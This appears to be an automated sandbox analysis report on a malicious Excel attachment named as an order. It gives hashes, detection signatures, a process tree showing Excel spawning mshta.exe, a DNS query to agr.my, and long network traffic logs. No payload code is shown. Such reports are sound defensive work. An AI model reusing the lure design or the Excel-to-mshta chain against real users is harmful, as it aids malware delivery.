Windows Analysis Report
ORDER 517-2025.xla.xlsx

Overview

General Information

Sample name: ORDER 517-2025.xla.xlsx
Analysis ID: 1648793
MD5: f9137fe9005de451da58b57301dba5b9
SHA1: 5d756a8364f3382703825b71c89247bb2d156f11
SHA256: 32df4f4afa4d06c6096d807535d584556cb7dca6234088299106a93a49a8e4ef
Tags: xla, xlsx, user-abuse_ch

Detection

Score: 56
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Legend: clean, suspicious, malicious.]
  • System is w10x64
  • EXCEL.EXE (PID: 7144 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 1384 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 1864 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 5824 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7144, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 1384, ProcessName: mshta.exe
Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton: Data: DestinationIp: 147.79.86.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7144, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7144, Protocol: tcp, SourceIp: 147.79.86.93, SourceIsIpv6: false, SourcePort: 443
Timestamp                         SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-03-26T08:12:53.394623+0100   2028371  3         Unknown Traffic  192.168.2.7  49700        13.107.246.38   443               TCP
2025-03-26T08:13:00.433166+0100   2028371  3         Unknown Traffic  192.168.2.7  49701        13.107.246.38   443               TCP
2025-03-26T08:13:00.433822+0100   2028371  3         Unknown Traffic  192.168.2.7  49702        13.107.246.38   443               TCP

AV Detection

Source: ORDER 517-2025.xla.xlsx, Virustotal: Detection: 28%
Source: ORDER 517-2025.xla.xlsx, ReversingLabs: Detection: 25%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.107.246.38:443 -> 192.168.2.7:49700 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\mshta.exe
Source: global traffic, DNS query: name: agr.my
Source: global traffic, DNS query: name: otelrules.svc.static.microsoft
Source: global traffic, TCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global traffic, TCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global traffic, TCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global traffic, TCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global traffic, TCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: Joe Sandbox View | IP Address: 13.107.246.38
Source: Joe Sandbox View | JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.7:49700 -> 13.107.246.38:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.7:49702 -> 13.107.246.38:443
